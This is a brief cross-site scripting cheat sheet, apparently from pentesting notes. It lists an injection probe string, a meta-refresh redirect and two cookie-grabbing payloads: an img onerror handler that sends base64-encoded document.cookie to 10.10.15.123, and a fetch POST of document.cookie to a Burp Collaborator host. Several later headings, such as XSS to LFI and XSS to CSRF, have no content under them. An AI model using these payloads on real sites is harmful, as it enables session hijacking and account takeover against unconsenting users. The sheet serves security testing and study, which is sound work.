XSS
Cross-Site Scripting
Ultimate checker: '"/><script>print()</script>.
Redirections
<head>
<meta http-equiv="refresh" content="0; URL=http://www.example.com/" />
</head>Data Grabbers
Cookies
Img tag:
<img src="x" onerror="this.src='http://10.10.15.123/?c='+btoa(document.cookie)">Fetch:
<script>
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>XMLHttpRequest
XSS to LFI
XSS to CSRF
If the endpoint is accessible only from localhost:
With capturing CSRF token first:
Last updated